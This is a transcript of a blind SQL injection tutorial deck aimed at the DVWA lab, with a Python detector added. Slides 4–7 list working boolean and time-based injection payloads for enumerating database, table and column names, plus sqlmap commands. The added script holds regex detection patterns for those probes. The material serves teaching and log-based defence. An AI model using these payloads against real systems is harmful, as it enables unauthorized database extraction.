Web Security Basics Tutorial, 灯芯@看雪学院.



Presentation on theme: "Web Security Basics Tutorial, 灯芯@看雪学院." Presentation transcript:

1 Web Security Basics Tutorial

2 SQL injection: blind injection. Injection testing. Basic use of sqlmap.

3 What is blind SQL injection? With an ordinary SQL injection, when we enter an SQL statement the result of executing it is returned to us; for example, if we insert database(), the result lists the name of the current database, dvwa. Blind injection is more like answering true/false questions: the result of what we execute is never displayed, the application only tells you "right" or "wrong", and nothing is echoed back. Echo: displaying the command being executed and its result.

4 Guess the length: 1' and length(database())>1 # (or >1, incrementing 1, 2, 3 … in turn); result: 4
Guess the database name: 1' and ascii(substr(database(),1,1))>97 # (compare against the ASCII code); result: dvwa. Using < and > quickly narrows down the range.
Guess the table names:
1. Guess the number of tables: 1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #
2. Guess the table name length: 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #
Get the table name: 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 #

5 Guess the column name length: 1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1 #
Guess the column name: 1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>120 #

6 sqlmap. Against a URL: python sqlmap.py -u "url". Against a captured request (saved to a file): python sqlmap.py -r 1.txt

7 Time-based blind injection. Determine the database name length: 1' and if(length(database())=4,sleep(3),1) #
Guess the database name: 1' and if(ascii(substr(database(),1,1))>97,sleep(3),1) #
Guess the number of tables: 1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1) #
Guess the table name length: 1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) #
All of the above can then be combined with binary search…
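Added example (my own code, not part of the presentation): a defender's view of the boolean-based and time-based probes from slides 4 to 7. Blind injection has no echo, so each character costs the attacker many near-identical requests; the script below decodes constructed access-log lines (IPs, paths and timestamps are invented, the payloads mirror the slides), tags each request with the technique its probe shape matches, and counts probes per source address, which is the volume signal that makes blind injection stand out in logs.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page). The payloads mirror the
# boolean-based and time-based probes on the slides, URL-encoded the way a browser
# or sqlmap sends them; the last line is a benign request for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+length%28database%28%29%29%3E1+%23&Submit=Submit HTTP/1.1" 200 4321
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3E97+%23&Submit=Submit HTTP/1.1" 200 4321
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+%28select+count%28table_name%29+from+information_schema.tables+where+table_schema%3Ddatabase%28%29%29%3D2%23&Submit=Submit HTTP/1.1" 200 4321
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+if%28length%28database%28%29%29%3D4%2Csleep%283%29%2C1%29+%23&Submit=Submit HTTP/1.1" 200 4321
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4321
"""

# Common log format: client IP, ident, user, [timestamp], "METHOD PATH PROTO", status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')

# One rule per probe shape the slides use; rule names are my own labels.
RULES = [
    ("boolean-length", re.compile(r"length\s*\(\s*database\s*\(\s*\)\s*\)", re.I)),
    ("boolean-char", re.compile(r"ascii\s*\(\s*substr\s*\(", re.I)),
    ("schema-enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("time-based", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
]

def classify(path):
    """Return the rule names matched by a request path (empty list if none)."""
    decoded = unquote_plus(path)
    # Decode a second time: double URL-encoding is a common way past naive filters.
    decoded = unquote_plus(decoded)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(log_text):
    """Return (ip, techniques) for every request that matches at least one rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        techniques = classify(m.group("path"))
        if techniques:
            hits.append((m.group("ip"), techniques))
    return hits

def probes_per_ip(hits):
    """Blind injection needs many requests per character, so count probes per source."""
    return Counter(ip for ip, _ in hits)
```

On real traffic the per-IP count over a short window is the more robust signal than any single pattern, since the individual probes differ only in the number being compared.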

8 Thanks

